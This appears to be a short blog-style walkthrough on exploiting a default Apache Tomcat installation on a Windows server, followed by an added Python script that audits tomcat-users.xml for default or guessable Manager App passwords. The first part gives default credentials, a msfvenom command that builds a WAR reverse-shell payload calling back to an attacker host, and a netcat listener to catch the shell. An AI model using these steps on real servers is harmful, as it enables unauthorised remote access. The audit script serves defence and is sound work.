How to exploit Apache Tomcat default install
A default Apache Tomcat installation allows you to upload a WAR file and spawn a reverse shell on the server.
This demo targets a Windows server.
The “Manager App” asks for a username and password, which are tomcat/s3cret by default.
First, generate the WAR file by running:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f war > rev.war
This generates a rev.war file, which we will upload through the manager page.
After a successful upload, a JSP page is created and the reverse shell is ready to go.
All we need to do is set up our TCP Netcat listener using:
nc -nlvp PORT
Then navigate to the new JSP page, and a shell will be spawned back to you.
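
The whole chain above depends on a Manager App account that still has a default or guessable password. The following is an added example, not part of the original post: a defender-side audit of a tomcat-users.xml file for such accounts. The function name, the weak-password list (apart from s3cret, which the post names) and the sample XML are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Passwords treated as default/guessable. "s3cret" is the value named on this
# page; the other entries are assumptions added for illustration.
WEAK_PASSWORDS = {"s3cret", "tomcat", "admin", "password", "changeit", ""}

# Roles that grant access to the Manager / Host Manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}


def _local(tag):
    """Strip an XML namespace so '{ns}user' and 'user' compare equal."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, reason, manager roles) for each risky account."""
    findings = []
    # Commented-out <user> entries are dropped by the parser, so only
    # accounts that are actually active get evaluated.
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        exposed = sorted(roles & MANAGER_ROLES)
        if not exposed:
            continue  # account cannot reach the deployment interface
        if password in WEAK_PASSWORDS:
            findings.append((name, "default or guessable password", exposed))
        elif password == name:
            findings.append((name, "password equals username", exposed))
    return findings


# Constructed sample configuration, not taken from a real server.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="app-user"/>
  <user username="ops" password="Xq7#rV2m!pL9wz" roles="manager-gui,admin-gui"/>
</tomcat-users>"""

if __name__ == "__main__":
    for user, reason, roles in audit_tomcat_users(SAMPLE):
        print(f"[!] {user}: {reason}; roles: {', '.join(roles)}")
```

Run it against the contents of conf/tomcat-users.xml. Any finding means the Manager App's WAR upload is reachable with a guessable login and the account should be removed or given a strong, unique password.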